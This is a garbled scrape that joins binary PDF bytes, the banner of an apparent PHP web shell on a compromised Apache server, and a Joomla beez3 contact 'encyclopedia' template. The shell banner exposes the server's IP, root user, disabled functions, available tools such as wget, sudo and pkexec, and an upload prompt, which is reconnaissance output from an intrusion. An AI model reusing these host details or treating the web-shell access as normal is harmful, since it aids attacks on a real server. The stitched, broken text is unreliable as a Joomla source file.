%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/11584/cwd/html/old/templates/beez3/html/com_contact/contact/ |
Upload File : |
<?php /** * @package Joomla.Site * @subpackage Templates.beez3 * * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ defined('_JEXEC') or die; $cparams = JComponentHelper::getParams('com_media'); ?> <div class="contact<?php echo $this->pageclass_sfx?>"> <?php $contactLink = ContactHelperRoute::getCategoryRoute($this->contact->catid);?> <h3> <span class="contact-category"><a href="<?php echo $contactLink; ?>"> <?php echo $this->escape($this->contact->category_title); ?></a> </span> </h3> <?php if ($this->contact->name && $this->params->get('show_name')) : ?> <h2> <span class="contact-name"><?php echo $this->contact->name; ?></span> </h2> <?php endif; ?> <div class="encyclopedia_col1"> <?php if ($this->contact->image ) : ?> <div class="contact-image"> <?php // We are going to use the contact address field for the main image caption. // If we have a caption load the caption behavior. ?> <?php if ($this->contact->address) { JHtml::_('behavior.caption'); }?> <?php echo JHtml::_('image', $this->contact->image, JText::_('COM_CONTACT_IMAGE_DETAILS'), array('align' => 'middle', 'class' => 'caption', 'title' => $this->contact->address)); ?> </div> <?php endif; ?> </div> <div class="encyclopedia_col2"> <?php // We are going to use some of the standard content fields in non standard ways. ?> <div class="contact-miscinfo"> <div class="contact-misc"> <?php echo $this->contact->misc; ?> </div> </div> <?php //Let's use position for the scientific name. ?> <?php if ($this->contact->con_position && $this->params->get('show_position')) : ?> <p class="contact-position"><?php echo $this->contact->con_position; ?></p> <?php endif; ?> <?php //Let's use state to put the family name. ?> <?php if ($this->contact->state && $this->params->get('show_state')) : ?> <p class="contact-state"><?php echo $this->contact->state; ?></p> <?php endif; ?> <?php // Let's use contry to list the main countries it grows in. '?> <?php if ($this->contact->country && $this->params->get('show_country')) : ?> <p class="contact-country"><?php echo $this->contact->country; ?></p> <?php endif; ?> </div> <div class="clr"> </div> <?php if ($this->params->get('presentation_style') != 'plain'):?> <?php echo JHtml::_($this->params->get('presentation_style').'.start', 'contact-slider'); ?> <?php endif ?> <div class="encyclopedia_links"> <?php echo $this->loadTemplate('links'); ?> </div> <?php if ($this->params->get('presentation_style') != 'plain'):?> <?php echo JHtml::_($this->params->get('presentation_style').'.end'); ?> <?php endif; ?> </div>